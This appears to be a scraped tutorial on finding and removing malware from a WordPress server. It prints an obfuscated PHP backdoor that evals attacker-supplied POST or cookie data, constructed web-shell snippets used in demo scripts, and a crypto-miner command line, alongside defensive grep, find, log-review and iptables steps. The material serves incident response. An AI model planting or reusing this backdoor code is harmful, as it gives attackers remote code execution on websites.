$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][97].$fb355e['l82418'][83].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][1].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][18].$fb355e['l82418'][86].$fb355e['l82418'][49].$fb355e['l82418'][83].$fb355e['l82418'][49].$fb355e['l82418'][68].$fb355e['l82418'][57].$fb355e['l82418'][18].$fb355e['l82418'][68]] = 
$fb355e['l82418'][78].$fb355e['l82418'][96].$fb355e['l82418'][78].$fb355e['l82418'][70].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][74].$fb355e['l82418'][97].$fb355e['l82418'][0].$fb355e['l82418'][11];$fb355e[$fb355e['l82418'][82].$fb355e['l82418'][86].$fb355e['l82418'][56].$fb355e['l82418'][86]] = $fb355e['l82418'][5].$fb355e['l82418'][11].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][97].$fb355e['l82418'][83].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][1].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][14].$fb355e['l82418'][49].$fb355e['l82418'][56].$fb355e['l82418'][56].$fb355e['l82418'][61].$fb355e['l82418'][61]] = $fb355e['l82418'][18].$fb355e['l82418'][83].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][67].$fb355e['l82418'][6].$fb355e['l82418'][21].$fb355e['l82418'][56].$fb355e['l82418'][57].$fb355e['l82418'][60].$fb355e['l82418'][0].$fb355e['l82418'][56].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][70].$fb355e['l82418'][68].$fb355e['l82418'][56].$fb355e['l82418'][49].$fb355e['l82418'][49].$fb355e['l82418'][54].$fb355e['l82418'][63].$fb355e['l82418'][49].$fb355e['l82418'][68]] = $fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][94].$fb355e['l82418'][21].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][57].$fb355e['l82418'][21].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][97].$fb355e['l82418'][94];$fb355e[$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][62].$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][45].$fb355e['l82418'][61].$fb355e['l82418'][67]] = 
$fb355e['l82418'][32].$fb355e['l82418'][49].$fb355e['l82418'][60].$fb355e['l82418'][54].$fb355e['l82418'][61].$fb355e['l82418'][6];$fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]] = $fb355e['l82418'][19].$fb355e['l82418'][23].$fb355e['l82418'][6].$fb355e['l82418'][61].$fb355e['l82418'][60];$fb355e[$fb355e['l82418'][0].$fb355e['l82418'][61].$fb355e['l82418'][61].$fb355e['l82418'][62]] = $_POST;$fb355e[$fb355e['l82418'][0].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][62]] = $_COOKIE;@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][90].$fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][21].$fb355e['l82418'][53].$fb355e['l82418'][0].$fb355e['l82418'][82], NULL);@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][53].$fb355e['l82418'][0].$fb355e['l82418'][82].$fb355e['l82418'][21].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][90].$fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][74], 0);@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][39].$fb355e['l82418'][83].$fb355e['l82418'][14].$fb355e['l82418'][21].$fb355e['l82418'][57].$fb355e['l82418'][14].$fb355e['l82418'][57].$fb355e['l82418'][60].$fb355e['l82418'][5].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][0].$fb355e['l82418'][11].$fb355e['l82418'][21].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][57], 
0);@$fb355e[$fb355e['l82418'][70].$fb355e['l82418'][68].$fb355e['l82418'][56].$fb355e['l82418'][49].$fb355e['l82418'][49].$fb355e['l82418'][54].$fb355e['l82418'][63].$fb355e['l82418'][49].$fb355e['l82418'][68]](0);$u604d9662 = NULL;$r5401375 = NULL;$fb355e[$fb355e['l82418'][1].$fb355e['l82418'][18].$fb355e['l82418'][56].$fb355e['l82418'][57].$fb355e['l82418'][57].$fb355e['l82418'][6].$fb355e['l82418'][6].$fb355e['l82418'][18]] = $fb355e['l82418'][6].$fb355e['l82418'][54].$fb355e['l82418'][62].$fb355e['l82418'][56].$fb355e['l82418'][45].$fb355e['l82418'][18].$fb355e['l82418'][49].$fb355e['l82418'][60].$fb355e['l82418'][80].$fb355e['l82418'][56].$fb355e['l82418'][54].$fb355e['l82418'][23].$fb355e['l82418'][61].$fb355e['l82418'][80].$fb355e['l82418'][6].$fb355e['l82418'][6].$fb355e['l82418'][86].$fb355e['l82418'][67].$fb355e['l82418'][80].$fb355e['l82418'][83].$fb355e['l82418'][23].$fb355e['l82418'][45].$fb355e['l82418'][56].$fb355e['l82418'][80].$fb355e['l82418'][63].$fb355e['l82418'][61].$fb355e['l82418'][60].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][86].$fb355e['l82418'][45].$fb355e['l82418'][45].$fb355e['l82418'][68].$fb355e['l82418'][54];global $zbdee44b;function  k547c($u604d9662, $c2fe6404){global $fb355e;$ue9100 = \"\";for ($f231=0; $f231<$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($u604d9662);){for ($s9716d=0; $s9716d<$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($c2fe6404) && $f231<$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($u604d9662); $s9716d++, $f231++){$ue9100 .= 
$fb355e[$fb355e['l82418'][83].$fb355e['l82418'][56].$fb355e['l82418'][67].$fb355e['l82418'][86].$fb355e['l82418'][54]]($fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]]($u604d9662[$f231]) ^ $fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]]($c2fe6404[$s9716d]));}}return $ue9100;}function  w1c974($u604d9662, $c2fe6404){global $fb355e;global $zbdee44b;return $fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]]($fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]]($u604d9662, $zbdee44b), $c2fe6404);}foreach ($fb355e[$fb355e['l82418'][0].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][62]] as $c2fe6404=>$f99f){$u604d9662 = $f99f;$r5401375 = $c2fe6404;}if (!$u604d9662){foreach ($fb355e[$fb355e['l82418'][0].$fb355e['l82418'][61].$fb355e['l82418'][61].$fb355e['l82418'][62]] as $c2fe6404=>$f99f){$u604d9662 = $f99f;$r5401375 = $c2fe6404;}}$u604d9662 = @$fb355e[$fb355e['l82418'][82].$fb355e['l82418'][86].$fb355e['l82418'][56].$fb355e['l82418'][86]]($fb355e[$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][62].$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][45].$fb355e['l82418'][61].$fb355e['l82418'][67]]($fb355e[$fb355e['l82418'][14].$fb355e['l82418'][49].$fb355e['l82418'][56].$fb355e['l82418'][56].$fb355e['l82418'][61].$fb355e['l82418'][61]]($u604d9662), $r5401375));if (isset($u604d9662[$fb355e['l82418'][83].$fb355e['l82418'][19]]) && $zbdee44b==$u604d9662[$fb355e['l82418'][83].$fb355e['l82418'][19]]){if ($u604d9662[$fb355e['l82418'][83]] == $fb355e['l82418'][97]){$f231 = 
Array($fb355e['l82418'][78].$fb355e['l82418'][70] => @$fb355e[$fb355e['l82418'][18].$fb355e['l82418'][86].$fb355e['l82418'][49].$fb355e['l82418'][83].$fb355e['l82418'][49].$fb355e['l82418'][68].$fb355e['l82418'][57].$fb355e['l82418'][18].$fb355e['l82418'][68]](),$fb355e['l82418'][74].$fb355e['l82418'][70] => $fb355e['l82418'][49].$fb355e['l82418'][92].$fb355e['l82418'][45].$fb355e['l82418'][80].$fb355e['l82418'][49],);echo @$fb355e[$fb355e['l82418'][74].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][56].$fb355e['l82418'][62].$fb355e['l82418'][18].$fb355e['l82418'][60].$fb355e['l82418'][63]]($f231);}elseif ($u604d9662[$fb355e['l82418'][83]] == $fb355e['l82418'][57]){eval\/*b1e3a6fe*\/($u604d9662[$fb355e['l82418'][56]]);}exit();}\r\n ?>\r\n<\/pre>\n

 <\/p>\n

So even though this function is the most common one, we recommend the following command to flush out malware:<\/p>\n

grep -r -i -F --include='*.php' '$GLOBALS' \/var\/www\/wordpress\/<\/pre>\n

The results will certainly be numerous, but with such a wide net you can go through them carefully and spot obfuscated malware. The sample above is typical: every function name is rebuilt character by character from an index string, and the final eval is split with a comment (eval\/*b1e3a6fe*\/), precisely so that a naive grep for eval( or base64_decode( finds nothing; the one thing it cannot hide is the $GLOBALS lookup it is built on, which is why this broad match is worth the noise. Note that the -F flag makes grep treat $ and [ literally and the quotes around *.php stop the shell from expanding the glob. You can also use a third-party scanner such as this one<\/a> to automate these queries, but scanners are not as reliable as manual analysis.<\/p>\n

 <\/p>\n

Do not hesitate to contact us if the logs are too large or if you have doubts about certain files!<\/strong><\/p>\n

 <\/p>\n

 <\/p>\n

Show the files modified in the last 24 hours<\/h3>\n
find \/var\/www\/wordpress\/ -mtime -1 -ls<\/pre>\n

The "-1" here selects files modified less than one day ago. If you change it to "+1", it shows files modified more than one day ago (find counts age in whole days, so in practice that means 48 hours or more). With no sign in front of the "1", only files whose age is exactly one day, that is between 24 and 48 hours, are shown. Keep in mind that the modification time is easy to forge: a dropper will often run touch so that the backdoor carries the same date as its neighbours. Repeat the search with -ctime -1, because the inode change time is updated by every write and every touch and cannot be set from userland, and treat a file with a recent ctime but an old mtime as highly suspicious.<\/p>\n

 <\/p>\n

Once the cleanup is done, run the following commands again to make sure nothing is left:<\/p>\n

 <\/p>\n

Detect shells hidden in .ico files<\/h3>\n
grep -r -i -F --include='*.ico' 'preg_replace' \/var\/www\/wordpress\/<\/pre>\n

 <\/p>\n

Detect injector shells<\/h3>\n
grep -r -i -F --include='*.php' '*\/ @include' \/var\/www\/wordpress\/<\/pre>\n
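As an added example that is not part of the original article, the following script gathers the three searches above (the $GLOBALS grep, the .ico shell grep and the injector grep) into one fixed-string scan over several indicators, and adds the ctime check that catches a backdated file which find -mtime -1 alone would miss. It builds a scratch tree of constructed sample files so it runs offline; the file names, contents and the indicator list are assumptions for the demo, and on a real site you would point scan_indicators and list_backdated at \/var\/www\/wordpress instead.<\/p>\n

```shell
#!/bin/sh
# Added example, not code from the original article. Builds a scratch
# WordPress-like tree of constructed sample files, then runs the checks
# the article describes: a multi-indicator grep (the $GLOBALS, .ico and
# "*/ @include" searches) and a timestamp check for backdated files.
# Indicator list, file names and layout are assumptions for the demo.

# Fixed strings typical of obfuscated PHP droppers, searched with grep -F
# so that '$', '[' and '*' are taken literally.
INDICATORS='$GLOBALS[
eval(
base64_decode(
gzinflate(
str_rot13(
*/ @include
preg_replace('

# scan_indicators DIR: print "relative/path: indicator" for every .php or
# .ico file under DIR that contains an indicator. An .ico file matching any
# of them is PHP code wearing an icon extension. This is a triage list, not
# a verdict: some legitimate plugins use eval( or base64_decode( too.
scan_indicators() {
    printf '%s\n' "$INDICATORS" | while IFS= read -r pat; do
        grep -rlF --include='*.php' --include='*.ico' -- "$pat" "$1" 2>/dev/null |
            sort | while IFS= read -r f; do
                printf '%s: %s\n' "${f#$1/}" "$pat"
            done
    done
}

# list_backdated DIR: files whose inode changed in the last day (ctime) but
# whose content timestamp (mtime) claims to be older. touch can forge mtime;
# it cannot forge ctime, so this catches timestomped backdoors.
list_backdated() {
    find "$1" -type f -ctime -1 ! -mtime -1
}

# count_recent_mtime DIR: what the article's 'find -mtime -1' alone sees.
count_recent_mtime() {
    find "$1" -type f -mtime -1 | wc -l | tr -d ' '
}

# make_sample_tree: constructed sample site; prints its path.
make_sample_tree() {
    dir=$(mktemp -d)
    mkdir -p "$dir/wp-includes" "$dir/wp-content/themes/x" "$dir/wp-content/uploads/2021/05"
    # clean theme file: no indicator
    printf '<?php add_action("init", "x_init");\n' > "$dir/wp-content/themes/x/functions.php"
    # obfuscated backdoor hidden among core files
    printf '<?php $GLOBALS["a"]=base64_decode($_POST["c"]); eval($GLOBALS["a"]);\n' \
        > "$dir/wp-includes/class-wp-tmp.php"
    # injector prepended to a legitimate entry point
    printf '<?php /*a1b2*/ @include "%s"; /*a1b2*/\ndefine("WP_USE_THEMES", true);\n' \
        "$dir/wp-content/uploads/2021/05/favicon_x.ico" > "$dir/index.php"
    # PHP shell disguised as an icon, then timestomped back to 2020
    printf '<?php preg_replace("/.*/e", $_POST["p"], "");\n' \
        > "$dir/wp-content/uploads/2021/05/favicon_x.ico"
    touch -t 202001010000.00 "$dir/wp-content/uploads/2021/05/favicon_x.ico"
    printf '%s' "$dir"
}

# Demonstration on the sample tree.
SAMPLE=$(make_sample_tree)
scan_indicators "$SAMPLE"
list_backdated "$SAMPLE"
rm -rf "$SAMPLE"
```

The timestomped .ico is invisible to the article's -mtime search (count_recent_mtime reports 3 of the 4 files) but list_backdated names it, because resetting mtime with touch is itself an inode change that bumps ctime.<\/p>\n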

 <\/p>\n

Detect a suspicious process<\/h3>\n
htop<\/pre>\n

This command lists every process running on your server (if htop is not installed, ps aux gives the same information). Look for a suspicious process and kill it with F9, but first note its PID, working directory and binary (ls -l \/proc\/PID\/cwd and ls -l \/proc\/PID\/exe), so that you can delete the executable and find whatever restarts it (a cron entry, a systemd unit or the web shell itself); otherwise it will be back within minutes. Example of a suspicious process, here a cryptocurrency miner (a Monero miner, judging by the cryptonight algorithm and the xmr pool: your server is mining coins for a third-party attacker):<\/p>\n

500      56885  198  0.1  69408  8028 ?        Sl   Sep23 5940:27 .\/cnrig -a cryptonight --donate-level 1 --max-cpu-usage 50 -o xmr.pool.minergate.com:45700 -u 4635633@mail.ru -p x --variant 1 -k<\/pre>\n

 <\/p>\n

Check the server logs<\/h2>\n

To make sure nobody else holds access to your server and no suspicious request is being made, you need to analyze your server's logs.<\/p>\n

 <\/p>\n

Analyze the latest SSH connections<\/h3>\n

To check who has recently connected to your SSH server, you can use the following commands:<\/p>\n

last\r\ncat \/var\/log\/auth.log<\/pre>\n

You will then be able to find unauthorized access attempts and block the IP addresses in question. On Red Hat derived systems the file is \/var\/log\/secure rather than auth.log, and lastb lists the failed attempts. Look not only at failures but at "Accepted" lines for accounts, key types or source addresses you do not recognise, and keep in mind that last reads wtmp, which an intruder with root can edit, so an empty history proves nothing.<\/p>\n

 <\/p>\n

Check the web server logs<\/h3>\n

Whether you run Apache or Nginx, your web server must record logs. If it does not, adjust your configuration. Depending on that configuration, these logs record a great deal of information beyond errors (each request's source IP, method, path, status code and user agent): that is what you will need to inspect.<\/p>\n

The logs are usually located in:<\/p>\n

\/var\/log\/<\/pre>\n

You can go to that directory and run:<\/p>\n

ls -ltr<\/pre>\n

to list the log files with the most recently modified at the bottom, then check their content.<\/p>\n

Also look at which IPs keep coming back and perform shady actions, such as POST requests to the infected .ico and .php files, then ban them with iptables:<\/p>\n

iptables -I INPUT -s CULPRIT_IP -j DROP<\/pre>\nReplace CULPRIT_IP with the offending address. Two caveats: a rule added this way is lost on reboot unless you save it (iptables-save, or the iptables-persistent package on Debian), and if the site sits behind a CDN or reverse proxy the logged address may be the proxy's own, in which case dropping it cuts off legitimate traffic; the real client address is then in the X-Forwarded-For header and must be blocked at the proxy instead.<\/p>\n
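As an added example, not code from the original article, here are the two log checks above (failed SSH logins per source address from auth.log, and POST requests aimed at .ico files or at PHP files under wp-content\/uploads from a combined-format access log) run over constructed sample lines, followed by a helper that turns the repeat offenders into the iptables rule shown above. The addresses, paths and the "2 hits" threshold are assumptions for the demo.<\/p>\n

```shell
#!/bin/sh
# Added example, not code from the original article. Runs the two log
# checks described in the text over constructed sample lines: failed SSH
# logins counted per source IP (auth.log), and POST requests to targets
# that should never receive one (combined-format access log).
# Sample addresses, paths and the ban threshold are assumptions.

# Constructed auth.log excerpt (sshd lines only).
sample_auth_log() {
    cat <<'EOF'
Sep 23 10:01:12 web sshd[1201]: Failed password for root from 203.0.113.7 port 51234 ssh2
Sep 23 10:01:15 web sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51236 ssh2
Sep 23 10:02:01 web sshd[1210]: Accepted publickey for deploy from 198.51.100.20 port 40000 ssh2
Sep 23 10:03:44 web sshd[1222]: Failed password for root from 198.51.100.99 port 2222 ssh2
EOF
}

# Constructed Apache/Nginx combined-format access log excerpt.
sample_access_log() {
    cat <<'EOF'
203.0.113.7 - - [23/Sep/2021:10:05:01 +0000] "POST /wp-content/uploads/2021/05/favicon_x.ico HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Sep/2021:10:05:03 +0000] "POST /wp-content/uploads/2021/05/wp-class.php?a=1 HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.20 - - [23/Sep/2021:10:06:10 +0000] "GET /index.php HTTP/1.1" 200 10240 "-" "Mozilla/5.0"
192.0.2.55 - - [23/Sep/2021:10:07:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3000 "-" "curl/7.68.0"
192.0.2.55 - - [23/Sep/2021:10:07:30 +0000] "POST /wp-content/uploads/x.php HTTP/1.1" 500 0 "-" "curl/7.68.0"
EOF
}

# ssh_failed_by_ip < auth.log: prints "IP count", most active source first.
ssh_failed_by_ip() {
    sed -n 's/.*Failed password for .* from \([0-9.]*\) port .*/\1/p' |
        sort | uniq -c | sort -rn | awk '{print $2, $1}'
}

# web_post_suspects < access.log: "IP count" of POSTs to targets that
# should never receive one: any .ico file, or a .php file inside uploads
# (WordPress never keeps PHP there). Field 6 is the quoted method, field 7
# the path; the query string is dropped so "x.php?cmd=id" is still caught.
web_post_suspects() {
    awk '$6 == "\"POST" {
            split($7, p, "?"); path = p[1]
            if (path ~ /\.ico$/ || path ~ /^\/wp-content\/uploads\/.*\.php$/) print $1
         }' |
        sort | uniq -c | sort -rn | awk '{print $2, $1}'
}

# ban_commands N < "IP count" lines: emit the article's iptables rule for
# every IP with at least N hits. Printed rather than executed so the list
# can be reviewed first (a CDN or proxy address must not be blocked).
ban_commands() {
    awk -v min="$1" '$2 >= min {printf "iptables -I INPUT -s %s -j DROP\n", $1}'
}

# Demonstration on the sample data.
sample_auth_log | ssh_failed_by_ip
sample_access_log | web_post_suspects
sample_access_log | web_post_suspects | ban_commands 2
```

On a real server feed the functions from the log files (ssh_failed_by_ip < \/var\/log\/auth.log, web_post_suspects < \/var\/log\/apache2\/access.log) and pipe the result through ban_commands only after checking the addresses by hand; note that the POST to wp-login.php is deliberately not flagged, since that endpoint legitimately receives POSTs and brute force against it is a separate, rate-based check.<\/p>\n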

 <\/p>\n

 <\/p>\n

What to do after a disinfection?<\/h2>\n

We cannot say it often enough, so we will repeat it: once you have finished cleaning your site, remember to carry out 3 small steps:<\/p>\n